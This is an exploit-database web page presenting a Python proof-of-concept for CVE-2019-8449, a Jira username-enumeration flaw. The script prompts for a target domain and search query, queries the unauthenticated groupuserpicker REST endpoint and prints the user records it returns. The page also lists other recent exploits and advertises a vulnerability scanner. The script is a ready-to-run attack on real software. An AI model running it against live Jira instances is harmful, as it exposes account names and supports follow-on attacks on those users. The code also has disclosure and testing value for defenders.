jira 8.3.4 information disclosure (username enumeration)

▸▸▸ Exploit & Vulnerability >> webapps exploit & java vulnerability

Online Vulnerability Scanner Tools

Code...

				
# Exploit Title: Jira 8.3.4 - Information Disclosure (Username Enumeration)
# Date: 2019-09-11
# Exploit Author: Mufeed VH
# Vendor Homepage: https://www.atlassian.com/
# Software Link: https://www.atlassian.com/software/jira
# Version: 8.3.4
# Tested on: Pop!_OS 19.10
# CVE : CVE-2019-8449

# CVE-2019-8449 Exploit for Jira v2.1 - v8.3.4
# DETAILS :: https://www.cvedetails.com/cve/CVE-2019-8449/
# CONFIRM :: https://jira.atlassian.com/browse/JRASERVER-69796

#!/usr/bin/env python


__author__  = "Mufeed VH (@mufeedvh)"

import os
import requests


class CVE_2019_8449:
    def ask_for_domain(self):
        domain = raw_input("[>] Enter the domain of Jira instance: => ")
        if domain == "":
            print("\n[-] ERROR: domain is required\n")
            self.ask_for_domain()
        self.url = "https://{}/rest/api/latest/groupuserpicker".format(domain)

    def ask_for_query(self):
        self.query = raw_input("[>] Enter search query: [required] (Example: admin) => ")
        if self.query == "":
            print("\n[-] ERROR: The query parameter is required\n")
            self.ask_for_query()    

    def exploit(self):
        self.ask_for_domain()
        self.ask_for_query()

        maxResults = raw_input("\n[>] Enter the number of maximum results to fetch: (50) => ")
        showAvatar = raw_input("\n[>] Enter 'true' or 'false' whether to show Avatar of the user or not: (false) => ")
        fieldId = raw_input("\n[>] Enter the fieldId to fetch: => ")
        projectId = raw_input("\n[>] Enter the projectId to fetch: => ")
        issueTypeId = raw_input("\n[>] Enter the issueTypeId to fetch: => ")
        avatarSize = raw_input("\n[>] Enter the size of Avatar to fetch: (xsmall) => ")
        caseInsensitive = raw_input("\n[>] Enter 'true' or 'false' whether to show results case insensitive or not: (false) => ")
        excludeConnectAddons = raw_input("\n[>] Indicates whether Connect app users and groups should be excluded from the search results. If an invalid value is provided, the default value is used: (false) => ")    

        params = {
            'query': self.query, 
            'maxResults': maxResults, 
            'showAvatar': showAvatar, 
            'fieldId': fieldId, 
            'projectId': projectId, 
            'issueTypeId': issueTypeId, 
            'avatarSize': avatarSize, 
            'caseInsensitive': caseInsensitive, 
            'excludeConnectAddons': excludeConnectAddons
        }

        send_it = requests.get(url = self.url, params = params)

        try:
            response = send_it.json()
        except:
            print("\n[-] ERROR: Something went wrong, the request didn't respond with a JSON result.")
            print("[-] INFO: It is likely that the domain you've entered is wrong or this Jira instance is not exploitable.")
            print("[-] INFO: Try visting the target endpoint manually ({}) and confirm the endpoint is accessible.".format(self.url))
            quit()
        
        print("\n<========== RESPONSE ==========>\n")
        print(response)
        print("\n<==============================>\n")

if __name__ == '__main__':
    os.system('cls' if os.name == 'nt' else 'clear')
    
    print('''
        ================================================
        |                                              |
        | CVE-2019-8449 Exploit for Jira v2.1 - v8.3.4 |
        |  Proof of Concept By: Mufeed VH [@mufeedvh]  |
        |                                              |
        ================================================
    ''')

    CVE_2019_8449().exploit()

Jira 8.3.4 information disclosure (username enumeration) Vulnerability / Exploit Source : Jira 8.3.4 information disclosure (username enumeration)

Last Vulnerability or Exploits

▸ gitlab 14.9 - stored cross-site scripting (xss) ◂

Discovered: 2022-04-26
Exploit: webapps
Vulnerability: ruby

▸ gitlab 14.9 - authentication bypass ◂

Discovered: 2022-04-26
Exploit: webapps
Vulnerability: ruby

▸ easeus data recovery - 'ensserver.exe' unquoted service path ◂

Discovered: 2022-04-19
Exploit: local
Vulnerability: windows

▸ ptpublisher v2.3.4 - unquoted service path ◂

Discovered: 2022-04-19
Exploit: local
Vulnerability: windows

Developers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Easy integrations and simple setup help you start scanning in just some minutes
Discover posible vulnerabilities before GO LIVE with your project
Manage your reports without any restriction

Business Owners

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Obtain a quick overview of your website's security information
Do an audit to find and close the high risk issues before having a real damage and increase the costs
Verify if your developers served you a vulnerable project or not before you are paying
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Run periodically scan for vulnerabilities and get info when new issues are present.

Penetration Testers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Quickly checking and discover issues to your clients
Bypass your network restrictions and scan from our IP for relevant results
Create credible proved the real risk of vulnerabilities

Everybody

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check If you have an website and want you check the security of site you can use our products
Scan your website from any device with internet connection

Tusted by

Our Cyber Security Web Test application uses Cookies. By using our Cyber Security Web Test application, you are agree that we will use this information. I Accept.